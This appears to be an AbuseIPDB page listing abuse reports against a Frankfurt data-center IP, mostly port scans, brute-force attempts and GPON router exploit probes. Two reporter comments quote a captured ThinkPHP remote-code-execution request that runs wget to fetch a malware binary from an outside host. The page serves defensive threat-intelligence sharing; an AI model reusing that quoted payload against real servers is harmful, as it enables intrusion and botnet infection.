JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 193.23.220.22

193.23.220.22 was found in our database!

This IP was reported 64 times. Confidence of Abuse is 0%: ?

ISP	LendNodes LTD
Usage Type	Data Center/Web Hosting/Transit
ASN	AS214079
Hostname(s)	network.lendnodes.cloud
Domain Name	lendnodes.cloud
Country	🇩🇪 Germany
City	Frankfurt am Main, Hesse

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 193.23.220.22

Whois 193.23.220.22

IP Abuse Reports for 193.23.220.22:

This IP address has been reported a total of 64 times from 52 distinct sources. 193.23.220.22 was first reported on February 19th 2026, and the most recent report was 3 months ago.

Old Reports: The most recent abuse report for this IP address is from 3 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2026-03-02 14:40:39 (3 months ago)	DZS.GPON.Remote.Code.Execution	Exploited Host
🇫🇮 geot	2026-02-22 00:21:22 (3 months ago)	GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec ... show more GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://193.23.220.<<removed>>/bins/nullpointer.x86 show less	Hacking Web App Attack
🇫🇷 carpes0708	2026-02-21 02:46:04 (3 months ago)		Port Scan Web App Attack
🇦🇹 urnilxfgbez	2026-02-20 23:45:00 (3 months ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇫🇷 geot	2026-02-20 13:01:33 (3 months ago)	POST /GponForm/diag_Form?images/ HTTP/1.1	Web App Attack
🇨🇭 SOC [GOLINE SA]	2026-02-20 09:02:49 (3 months ago)	FortiGate detected IPS attack from IPv4 address 193.23.220.22	Hacking
Anonymous	2026-02-20 08:01:59 (3 months ago)	"GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exe ... show more "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://193.23.220.76/bins/nullpointer.x86" show less	Hacking Web App Attack
🇺🇸 gu-alvareza	2026-02-20 07:05:08 (3 months ago)	DZS.GPON.Remote.Code.Execution	Hacking Web App Attack
🇵🇱 mkey	2026-02-20 06:49:41 (3 months ago)	[2026-02-20 05:34:37] Unauthorized connection probe. Source on blacklist ((spp_reputation) packets b ... show more [2026-02-20 05:34:37] Unauthorized connection probe. Source on blacklist ((spp_reputation) packets blacklisted) show less	Hacking Port Scan
Anonymous	2026-02-20 06:09:45 (3 months ago)	<jail> banned by fail2ban	Brute-Force Web App Attack
Anonymous	2026-02-20 06:04:27 (3 months ago)	IP & Port Scan.	SSH Port Scan Brute-Force
🇨🇿 Countryman	2026-02-20 04:57:57 (3 months ago)	repeated unauthorized connection attempts, host sweep, port scan	Port Scan
Anonymous	2026-02-20 04:55:06 (3 months ago)	193.23.220.22 7 Fraudulent scans detected	Hacking Web App Attack
🇩🇪 Mr-Money	2026-02-20 04:47:11 (3 months ago)	scenario: crowdsecurity/thinkphp-cve-2018-20062 - events: 1	Web App Attack Hacking
🇨🇦 yukon.ca	2026-02-20 04:43:51 (3 months ago)	Application Servers Protection Violation: Dasan GPON Router Authentication Bypass Port:80	Hacking Exploited Host

Showing 1 to 15 of 64 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇷🇴 80.94.92.130

🇫🇮 2a01:4f9:c013:c11d::1

🇨🇳 222.174.184.86

🇧🇷 187.73.93.29

🇺🇸 185.149.26.71

🇮🇳 122.187.229.235

🇨🇳 121.237.180.222

🇻🇳 103.63.108.25

🇫🇷 92.205.57.72

🇫🇷 83.171.226.124

🇺🇸 188.213.202.12

🇮🇶 185.158.22.150

🇺🇸 137.184.228.138

🇷🇺 95.79.57.221

🇩🇪 69.5.169.27

🇺🇸 64.62.156.222

🇳🇱 45.148.10.141

🇪🇬 41.33.91.226

🇳🇱 20.229.115.183

🇺🇸 20.163.6.84